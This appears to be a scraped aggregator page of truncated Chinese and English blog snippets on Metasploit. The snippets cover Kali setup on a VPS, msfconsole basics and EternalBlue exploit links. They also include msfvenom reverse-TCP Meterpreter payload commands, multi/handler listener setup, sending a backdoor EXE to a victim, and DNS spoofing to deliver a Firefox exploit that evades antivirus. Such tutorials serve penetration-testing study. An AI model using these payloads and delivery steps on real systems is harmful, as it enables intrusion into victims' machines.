metasploit

在vps上安装 kali linux

梦想与她 提交于 2019-11-28 06:02:05
在渗透测试过程中,很多时候我们需要反弹一个shell回来。使用empire也好,MSF也好,其他工具也好,都避不开公网IP的问题。这时候我们就需要一个VPS来进一步进行渗透测试。 建立通道连接的方式有很多种,比如NAT映射、ssh隧道等各种方式,这里我们就不探讨了。 建立通道的不稳定性很高,容易断开,对网络安全爱好者来说是一种莫大的折磨。而且可能由于种种原因,购买不到KVM架构的VPS,无法直接在VPS上安装kali linux等渗透测试系统。下面介绍了几种在debian系统下安装kali linux的方法。配合使用screen,或者tmux等工具非常好用 首先我们为我们的VPS安装Debian 8 几乎万能的方法—docker Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的 Linux 机器上,也可以实现虚拟化。容器是完全使用沙箱机制,相互之间不会有任何接口。 由于docker的运行环境中需要3.8+的内核,此方法不是特别适用,可使用uname -a来检查VPS的内核版本。比如小编的VPS厂商给出的镜像,内核版本只有2.6+。如果你的内核版本低于3.8,请略过该方法,往下看。 安装docker 在debian 8 下安装docker http://www.docker.org.cn/book/install

metasploit篇

≯℡__Kan透↙ 提交于 2019-11-28 03:09:48
基本使用: 1、在kali中metasploit默认使用postgresql作为它的数据库; /etc/init.d/postgresql start 开机自启:update-rc.d postgresql enable。 2、初次使用数据库服务时需初始化,以便创建系统默认的数据库及数据库用户; msfdb init(默认创建的数据库名:msf,msf_test;用户名:msf;口令默认为空) 成功初始化会输出如下信息: 3、启动metasploit:msfconsole 4、查看数据库连接状态 5、工作台相关指令: workspace -a test      新建test工作台 workspace -d test      删除test工作台 workspace test       切换到test工作台 6、获取帮助信息 来源: https://www.cnblogs.com/steven9898/p/11388131.html

15.永恒之蓝exp----

北城余情 提交于 2019-11-28 01:47:38
永恒之蓝exp 2017年,影响于全世界 SMB ripid7官网获取ms17-010的exp信息 Rapid7: https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue Scanner: https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb Doublepulsar exploit: https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit 来源: https://www.cnblogs.com/sec875/p/11386454.html

Metasploit Installation on Windows 7 and 10

蓝咒 提交于 2019-11-26 16:21:21
The Metasploit Framework (MSF) is far more than just a collection of exploits. It’s an infrastructure that you can build upon and utilize for your custom needs. This allows you to concentrate on your unique environment, and not have to reinvent the wheel. I consider the MSF to be one of the single most useful auditing tools freely available to security professionals today. From a wide array of commercial grade exploits and an extensive exploit development environment, all the way to network information gathering tools and web vulnerability plugins, the Metasploit Framework provides a truly

msf拿到shell之后的一条龙套餐

ぃ、小莉子 提交于 2019-11-26 09:25:49
生成ps 反弹脚本 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.123 lport=12345 -f psh-reflection>/tmp/search.ps1 msf 监听反弹 msf > use exploit/multi/handler msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.43.100 msf exploit(handler) > set LPORT 4444 msf exploit(handler) > set ExitOnSession false msf exploit(handler) > exploit -j -z [*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.43.100:4444 以上是 如何 用msfvenom 生成木马,并且 msf 如何监听 木马运行之后 弹的shell。 包括昨天 用的 green-hat-suite_Pass 这个工具 已经凉了啊感觉 ......

kali linux metasploit的web渗透测试(二)-内网火狐浏览器渗透拿权限

假装没事ソ 提交于 2019-11-26 09:25:04
这一章,介绍如何利用metasploit进行火狐浏览器的渗透拿权限,需要在内网环境下 需要利用的技术是:可以使用ettercap(dns欺骗)或者mitmf(插入一段html地址),这两项技术就不再这里介绍与操作了,如何操作,请自行百度! 利用的模块有:exploit/multi/browser/firefox_webidl_injection,exploit/firefox/local/exec_shellcode ----绕过360拿shell 第一个模块:firefox_webidl_injection 是生成一个攻击链接,然后使用ettercap的dns欺骗或者mitmf插入这段攻击链接,只要让受害者访问这个链接,就会返回一个shell firefox的session 。 第二个模块:exec_shellcode是把上一个模块获取到的shell firefox session 提升为meterpreter,拿到meterpreter,然后进行进一步的渗透,下面介绍使用方法 打开metasploit,使用use来调用这两个模块 第一个模块:firefox_webidl_injection 对火狐浏览器使用的版本有限制,使用info命令查看Description的详情来查看适用版本范围 这里显示对firefox 22-27版本的才有效,于是我在kali

metasploit - exploits

丶灬走出姿态 提交于 2019-11-26 09:22:56
msf > use exploits/ use exploit/aix/rpc_cmsd_opcode21 use exploit/aix/rpc_ttdbserverd_realpath use exploit/android/browser/samsung_knox_smdm_url use exploit/android/browser/webview_addjavascriptinterface use exploit/android/fileformat/adobe_reader_pdf_js_interface use exploit/android/ local /futex_requeue use exploit/apple_ios/browser/safari_libtiff use exploit/apple_ios/email/mobilemail_libtiff use exploit/apple_ios/ssh/cydia_default_ssh use exploit/bsdi/softcart/mercantec_softcart use exploit/dialup/multi/login/manyargs use exploit/firefox/ local /exec_shellcode use exploit/freebsd/ftp

Kali-利用metasploit中的exploit/multi/handler进行攻击

烈酒焚心 提交于 2019-11-26 09:20:49
在攻击服务器上生成连接软件,LHOST为攻击机IP地址 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.133 LPORT=443 -f exe -o met.exe 打开msfconsole控制台 root@qzwhost:~# msfconsole msfconsole > use exploit/multi/handler msfconsole (exploit/multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp msfconsole (exploit/multi/handler) > set LHOST <IP> msfconsole (exploit/multi/handler) > set LPORT 443 msfconsole (exploit/multi/handler) > exploit 将软件发给客户机上运行,此时kali上会有连接提示 此时连接建立成功,输入shell测试 出现Windows命令行则说明攻击成功 如果提醒如下,输入shell显示meterpreter > shell [-] Unknown command: shell.,说明链接未建立成功 meterpreter > shell [-]